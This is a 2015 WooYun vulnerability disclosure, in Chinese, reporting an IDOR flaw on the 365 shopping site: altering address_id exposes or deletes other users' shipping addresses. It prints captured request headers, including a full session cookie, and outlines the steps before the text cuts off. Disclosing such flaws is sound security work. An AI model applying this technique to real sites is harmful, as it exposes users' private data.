365商城某处平行权限漏洞（用户信息泄露） | wooyun-2015-0142653

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0142653

漏洞标题：

365商城某处平行权限漏洞（用户信息泄露）

漏洞详情

披露状态：

2015-09-22：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-06：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

商城站点越权删除漏洞，修改address_id随便看用户隐私

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://www.365.com/my/address
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: hub365_session=k%2F%2BkmnlRjGFsE%2BVcw2jjvFPuwt1gZ5EiLIpt0b47FP5lcT0YS%2FeDPk90hSFMuEaMqLwy33LN6gZucEk2mHuilAKKM0IVki2k0FA%2BtSYuxTiRZQy0yrUO7Gz%2B8iyrNqDf7u%2FIeE6Ll6CJSBtfQoGPeBlNX1%2FbF2OFiGhk%2FFQaoNBV4%2FSI9dXOVkEsIP%2Bk72p82rjtVmKE9okBGn0yic1SpcQeK%2FJa4Vv4Yc21cebeRSZ6neiyBhOxveqbzBXs1Tm%2BhdCoYTE2p46Y3fVi96dED9etXUglKck2SVVJ99%2FkJrlspYXtZmkbta%2FjQklL5bJ44u%2Fy0HB49PU3Z8BE4FYX0hmvPWYAHONbmA8mqljE7VQPeCQhgh5h8szb8ZHk5ABRflYVQVCPmyzOXP7SeidhgjucgCPlospoN2frclae1Zl3KkL6n1%2BLFOOC5dPe%2BChB6nza4X%2BlqeqjeZRrjoVuL%2BHOo3Tc6yMgqRPvy8XhmW6Byyf8k3HTidHutXIHJf78FUZ8w282mRY927RoU%2BgnnFfIbW82JvUDOkQY6%2BL80zCFKVO8VcrMOQB4mhTIWwJzD2anFw2GWrcF42FmCJb0gn8Rn1W7EEV62zs0enpoYksvNB%2F57zeUHKHd5wxtpYmF; __utmt=1; __utma=196659955.1578587672.1442839909.1442839909.1442839909.1; __utmb=196659955.39.10.1442839909; __utmc=196659955; __utmz=196659955.1442839909.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; Hm_lvt_29dd07a8a73cf872888e406e01ee766f=1442839909; Hm_lpvt_29dd07a8a73cf872888e406e01ee766f=1442841138

在收货地址处能够越权删除用户地址
我注册了一个账号，随意添加了一个收货地址
在修改的时候抓包得到id，我们记录下